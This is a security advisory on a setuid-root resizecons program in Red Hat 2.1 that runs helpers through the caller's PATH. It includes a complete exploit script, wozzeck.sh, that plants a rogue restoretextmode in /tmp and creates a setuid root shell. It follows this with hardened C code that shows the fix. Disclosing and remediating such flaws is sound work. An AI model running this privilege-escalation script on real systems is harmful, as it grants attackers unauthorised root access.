There is a security hole in Red Hat 2.1, which installs the program
/usr/bin/resizecons suid root. The resizecons program allows a user to
change the video mode of the console. During this process it runs the
program restoretextmode without an absolute pathname, assuming the correct
version will be found in the PATH, while still running with root
privileges. It then executes setfont in the same manner. By setting PATH
to point at a rogue restoretextmode, a user can execute an arbitrary
program as root.

As a more amusing aside, the file /tmp/selection.pid is read and the pid
contained within is sent a SIGWINCH, allowing any user on the system to
force a redraw of the screen in an arbitrary process on the machine (any
process that handles SIGWINCH).

If /usr/bin/resizecons needs to be run by users other than root at the
console, the code needs to execute the outside utilities with absolute
pathnames (and a sanitized environment rather than the caller's), and to
check the ownership and access rights of files such as /tmp/selection.pid
before acting on their contents.

Program: /usr/bin/resizecons
Affected Operating Systems: Red Hat 2.1 linux distribution
Requirements: account on system
Temporary Patch: chmod -s /usr/bin/resizecons
Security Compromise: root
Author: Dave M. (davem@cmu.edu)
Synopsis: resizecons runs restoretextmode without an absolute pathname
while executing as root, allowing a user to substitute the real program
with arbitrary commands.

Exploit:

wozzeck.sh:

#!/bin/sh
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to Wozz. Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi
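The advisory's fix (absolute pathnames for helpers, and checking file access rights before acting on a pid file) is illustrated below with an added example in C. This is not resizecons' own code and was not written by the advisory's author; the function names run_helper_safe, run_helper_vulnerable, parse_pid and redraw_pid, the fixed PATH value and the pid-file checks are assumptions made for the illustration. It shows the PATH-searching execvp() pattern that the exploit abuses beside a hardened launcher that refuses relative paths, drops root to the real user before exec and passes a fixed environment, plus a pid-file reader that verifies ownership on the open descriptor and only signals after privileges are dropped.

```c
/*
 * Added example (not resizecons' own code): hardened helper launcher and
 * pid-file handling for a setuid-root program. Function names and the
 * fixed PATH below are assumptions made for this illustration.
 */
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Drop root permanently to the caller's real uid/gid. Returns 0 on success. */
static int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    /* If we were setuid root, regaining uid 0 must now fail. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/*
 * The vulnerable pattern from the advisory, for contrast: execvp() (like
 * system()) searches the caller's $PATH while still running as root, so
 * PATH=/tmp makes /tmp/restoretextmode run with root privileges.
 */
void run_helper_vulnerable(const char *helper, char *const argv[])
{
    execvp(helper, argv);
    _exit(127);
}

/*
 * Hardened launcher: absolute path only, privileges dropped to the real
 * user in the child before exec, and a fixed minimal environment so the
 * caller's PATH, IFS, LD_* etc. cannot influence the helper.
 * Returns the helper's exit status, or -1 on error.
 */
int run_helper_safe(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;              /* refuse anything that would be PATH-searched */

    pid_t child = fork();
    if (child < 0)
        return -1;
    if (child == 0) {
        static char *const clean_env[] = { "PATH=/bin:/usr/bin", NULL };
        if (drop_privileges() != 0)
            _exit(127);
        execve(abs_path, argv, clean_env);
        _exit(127);             /* exec failed */
    }
    int status;
    if (waitpid(child, &status, 0) != child || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Strict pid parser: digits only, optional trailing newline, pid >= 2 (never init). -1 on error. */
pid_t parse_pid(const char *s)
{
    char *end;
    if (!isdigit((unsigned char)s[0]))
        return -1;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || v < 2 || v > INT_MAX)
        return -1;
    if (*end == '\n')
        end++;
    return *end == '\0' ? (pid_t)v : -1;
}

/*
 * The /tmp/selection.pid problem: instead of signalling whatever pid a
 * world-writable file names while root, drop privileges first (so kill()
 * only reaches the user's own processes), open without following symlinks,
 * and verify the owner with fstat() on the open descriptor rather than a
 * racy pre-check. Returns 0 on success, -1 on any failure.
 */
int redraw_pid(const char *pidfile)
{
    if (drop_privileges() != 0)
        return -1;
    int fd = open(pidfile, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    char buf[32];
    ssize_t n = -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == getuid())
        n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    pid_t pid = parse_pid(buf);
    if (pid < 0)
        return -1;
    return kill(pid, SIGWINCH);     /* EPERM for other users' processes */
}
```

Two points worth noting. First, a pre-check with access(2) before open(2), which is what "check access rights before opening" suggests if taken literally, leaves a window in which /tmp/selection.pid can be swapped for a symlink; checking fstat() on the descriptor you actually read closes that window. Second, dropping privileges is the stronger defence for both bugs: once the helper and the kill() run as the real user, a rogue restoretextmode gains nothing and a forged pid can only reach that user's own processes.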